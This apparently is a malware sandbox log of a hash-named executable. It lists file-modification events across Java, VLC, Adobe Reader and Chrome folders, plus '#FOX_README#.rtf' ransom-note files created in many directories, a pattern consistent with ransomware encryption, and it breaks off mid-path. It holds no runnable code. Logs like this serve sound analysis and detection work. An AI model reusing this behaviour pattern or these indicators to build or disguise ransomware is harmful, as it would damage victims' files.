C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\macGrey.png f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Montevideo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Ashgabat f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Amsterdam f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\ECLIPSE_.RSA f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\PMP\AdobePDF417.pmp f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Chicago f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\org-netbeans-core_visualvm.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\fy\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\logging.properties f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\COPYING.txt f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Ndjamena f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.nl_zh_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\zh_TW\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Detroit f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\about.html f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.ja_5.5.0.165303\feature.properties f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.jarprocessor_1.0.300.v20131211-1531.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Broken_Hill f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-5 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\PMP\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Bougainville f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\e4-dark_preferencestyle.css f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\OutPing.sql f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\alt-rt.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-spi-quicksearch.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\CST6CDT f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jre7\lib\zi\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\co\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_75_ffe45c_1x100.png f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Menominee f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\images\cursors\win32_CopyNoDrop32x32.gif f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-attach.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-keyring.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-io.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\license.html f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jdb.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\sq\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-charts.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.net.nl_ja_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\ca\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.zh_CN_5.5.0.165303.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-windows.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\README-JDK.html f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages.properties f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\bin\server\Xusage.txt f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\javafx.properties f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\as90.xsl f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\sysinfo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ql.nl_zh_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.databinding.nl_ja_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-util-enumerations_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-uihandler.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\org-openide-util-lookup.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\PMP\QRCode.pmp f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Anadyr f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.http.registry_1.1.300.v20130402-1529.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\feature.properties f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Adak f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm\PYCC.pf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-options-api.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\sw.pak f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\hrtfs\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\images\cursors\win32_CopyDrop32x32.gif f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Dubai f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_de_DE.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-host-views.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-search_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.console_1.1.0.v20140131-1639.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\feature.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\Rothera f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.mbeanbrowser_5.5.0.165303.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\oc\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\skins\skin.catalog f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.provider.filetransfer.ssl_1.0.0.v20140827-1444.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.ds_1.4.200.v20131126-2331.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Karachi f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\nl.pak f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.observable_1.4.1.v20140210-1835.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench_1.2.1.v20140901-1244.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\ff\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Lagos f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Anadyr f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgeCalls.c f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Irkutsk f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Catamarca f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\eu\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.addons.swt.nl_zh_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\CET f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-sa_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-multitabs.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+11 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-util-enumerations.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroBroker.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Halifax f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\kk\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\images\cursors\cursors.properties f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\eclipse.inf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-templates.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Ulaanbaatar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\xjc.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\ext\localedata.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\QuickTime.mpp f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Atikokan f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-profiler_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\AddComplete.vssm f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Cancun f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Bermuda f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Dili f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.runtime_3.10.0.v20140318-2214.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Juneau f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host-views_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Funafuti f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Tahiti f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-compat.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\java.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\playlist.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-util-enumerations.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-progress-ui_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ca\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\rmid.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_ru.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-output2_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-utilities_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\84.0.4147.89.manifest f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\elevation_service.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-lib-profiler.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Melbourne f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-services_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaSansDemiBold.ttf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt.win32.win32.x86_64_3.103.1.v20140903-1947.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-lib-profiler-common.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_20_666666_40x40.png f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\feature.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-dialogs_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program 